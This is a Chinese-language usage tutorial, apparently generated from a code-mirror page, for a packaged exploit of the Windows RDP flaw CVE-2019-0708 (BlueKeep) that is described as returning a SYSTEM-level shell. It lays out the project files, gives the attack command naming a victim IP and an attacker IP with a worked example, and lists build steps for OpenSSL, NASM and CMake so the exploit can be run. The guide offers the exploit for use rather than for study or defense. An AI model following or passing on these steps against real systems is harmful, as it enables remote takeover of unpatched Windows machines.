CVE-2019-0708-EXP-Windows 项目使用教程

CVE-2019-0708-EXP-Windows 项目使用教程

CVE-2019-0708-EXP-WindowsCVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2019-0708-EXP-Windows

1. 项目的目录结构及介绍

CVE-2019-0708-EXP-Windows/
├── README.md
├── license
├── CVE-2019-0708-EXP-Windows-Version
│   ├── wfreerdp.exe
│   ├── openssl.7z
│   ├── gzopenssl-1.0.2s.tar.gz
│   └── ...
└── ...

• README.md: 项目说明文件，包含项目的基本介绍和使用说明。
• license: 项目许可证文件。
• CVE-2019-0708-EXP-Windows-Version: 主要功能文件夹，包含可执行文件和相关依赖。
  • wfreerdp.exe: 项目的启动文件，用于执行远程桌面服务的漏洞利用。
  • openssl.7z: OpenSSL 压缩包，用于加密通信。
  • gzopenssl-1.0.2s.tar.gz: OpenSSL 源码压缩包。

2. 项目的启动文件介绍

项目的启动文件是 wfreerdp.exe，这是一个可执行文件，用于在 Windows 系统上利用 CVE-2019-0708 漏洞。启动文件的使用方法如下：

wfreerdp.exe /v:Victim_IP /l:Attacker_IP

• /v:Victim_IP: 指定目标受害者的 IP 地址。
• /l:Attacker_IP: 指定攻击者的 IP 地址。

例如：

wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

3. 项目的配置文件介绍

项目中没有明确的配置文件，但依赖于一些外部环境和工具，如 OpenSSL 和 NASM。以下是安装和配置这些工具的步骤：

安装 OpenSSL

1. 下载并解压 openssl.7z 至 C:\openssl\。
2. 使用已编译好的 OpenSSL 环境。

安装 NASM

1. 下载并安装 NASM 编译环境。

安装 CMake

1. 下载并安装 cmake-3.15.3-win64-x64.msi。
2. 添加 C:\Program Files\CMake\bin 至系统环境变量 PATH。
3. 重启计算机。

运行 CMake

"C:\Program Files\CMake\bin\cmake"

通过以上步骤，您可以配置好项目所需的环境，并成功运行 wfreerdp.exe 进行漏洞利用。

CVE-2019-0708-EXP-WindowsCVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2019-0708-EXP-Windows